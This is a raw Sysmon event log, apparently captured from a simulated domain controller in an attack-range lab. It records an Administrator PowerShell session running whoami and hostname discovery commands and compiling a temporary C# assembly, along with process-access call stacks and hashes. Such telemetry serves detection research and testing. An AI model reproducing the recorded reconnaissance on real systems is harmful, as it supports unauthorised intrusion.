10341000x80000000000000001695423Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:20.723{05ADC7E1-7060-603D-4E88-00000000AD01}81606520C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe{05ADC7E1-7060-603D-4F88-00000000AD01}8364C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+b181|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3d58|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3ed0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3fa6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+274e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+27a0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+28e4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+7e38f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45d22|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+448ef|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+445e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+44303|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+18321|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+17b76|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+9e0d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+1edf02|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001695422Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:20.735{05ADC7E1-7060-603D-4F88-00000000AD01}8364C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe12.00.52519.0 built by: VSWINSERVICINGMicrosoft® Resource File To COFF Object Conversion UtilityMicrosoft® .NET FrameworkMicrosoft CorporationCVTRES.EXEC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\2\RESC8EB.tmp" "c:\Users\Administrator\AppData\Local\Temp\2\4fuahqur\CSC5D1B3DB0F9FD4679A7701ADBE835108E.TMP"C:\Users\Administrator\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF{05ADC7E1-7060-603D-4E88-00000000AD01}8160C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\2\4fuahqur\4fuahqur.cmdline" 10341000x80000000000000001695421Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:20.653{05ADC7E1-7049-603D-4288-00000000AD01}62085740C:\Windows\system32\conhost.exe{05ADC7E1-7060-603D-4E88-00000000AD01}8160C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695420Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:20.653{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695419Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:20.653{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695418Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:20.653{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695417Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:20.653{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695416Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:20.653{05ADC7E1-29F0-6039-C005-00000000AD01}49442420C:\Windows\system32\csrss.exe{05ADC7E1-7060-603D-4E88-00000000AD01}8160C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001695415Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:20.653{05ADC7E1-7049-603D-4188-00000000AD01}57848908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-7060-603D-4E88-00000000AD01}8160C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+270222|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+26fe9f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+26f9ee|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+26f97a|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+26e48b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+7c242b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+7c18d9|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\8052f993fc8b33a503daf487ee7faec3\Microsoft.PowerShell.Commands.Utility.ni.dll+20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\8052f993fc8b33a503daf487ee7faec3\Microsoft.PowerShell.Commands.Utility.ni.dll+20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fc183cc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf41a5(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf3e76(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+706a54db(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbb4a0c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fc12edb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf63d1(wow64) 154100x80000000000000001695414Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:20.631{05ADC7E1-7060-603D-4E88-00000000AD01}8160C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe4.7.2053.0 built by: NET47REL1Visual C# Command Line CompilerMicrosoft® .NET FrameworkMicrosoft Corporationcsc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\2\4fuahqur\4fuahqur.cmdline"C:\Users\Administrator\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52{05ADC7E1-7049-603D-4188-00000000AD01}5784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 23542300x80000000000000001695413Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:20.629{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=97650F6AE866F7743475610B455F91AE,SHA256=7B29E325BBD1C6114E01FC982AEF41ED593A404BBFA364065BFD5459CF8C4E31,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001695412Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:20.614{05ADC7E1-7049-603D-4188-00000000AD01}5784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\4fuahqur\4fuahqur.cmdline2021-03-01 22:53:20.614 11241100x80000000000000001695411Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.localDLL2021-03-01 22:53:20.614{05ADC7E1-7049-603D-4188-00000000AD01}5784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\4fuahqur\4fuahqur.dll2021-03-01 22:53:20.614 354300x80000000000000001695410Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:12.141{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-974.attackrange.local53domainfalse127.0.0.1win-dc-974.attackrange.local51573- 10341000x80000000000000001695409Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:20.395{05ADC7E1-7049-603D-4288-00000000AD01}62085740C:\Windows\system32\conhost.exe{05ADC7E1-7060-603D-4D88-00000000AD01}4180C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695408Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:20.395{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695407Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:20.395{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695406Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:20.395{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695405Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:20.395{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695404Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:20.395{05ADC7E1-29F0-6039-C005-00000000AD01}49441064C:\Windows\system32\csrss.exe{05ADC7E1-7060-603D-4D88-00000000AD01}4180C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001695403Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:20.395{05ADC7E1-7049-603D-4188-00000000AD01}57848908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-7060-603D-4D88-00000000AD01}4180C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+7075331b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf41a5(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf3e76(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+706a54db(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbb4a0c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fc12edb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf63d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbe8356(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf4889(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf4425(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf41a5(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf3e76(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+706a54db(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbb4a0c(wow64) 154100x80000000000000001695402Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:20.395{05ADC7E1-7060-603D-4D88-00000000AD01}4180C:\Windows\System32\whoami.exe10.0.14393.0 (rs1_release.160715-1616)whoami - displays logged on user informationMicrosoft® Windows® Operating SystemMicrosoft Corporationwhoami.exe"C:\Windows\system32\whoami.exe"C:\Users\Administrator\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=AA1E17EA3DB5CD9D8BC061CAEC74C6E8,SHA256=8ECFFCCE38D4EE87ABAEE6CBE843D94D4F8FB98FAB3C356C7F6B70E60B10F88A,IMPHASH=E24E330FA9663CE77F2031CACAEB3DF9{05ADC7E1-7049-603D-4188-00000000AD01}5784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 10341000x80000000000000001695401Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:20.379{05ADC7E1-7049-603D-4288-00000000AD01}62085740C:\Windows\system32\conhost.exe{05ADC7E1-7060-603D-4C88-00000000AD01}8236C:\Windows\system32\HOSTNAME.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695400Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:20.379{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695399Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:20.379{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695398Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 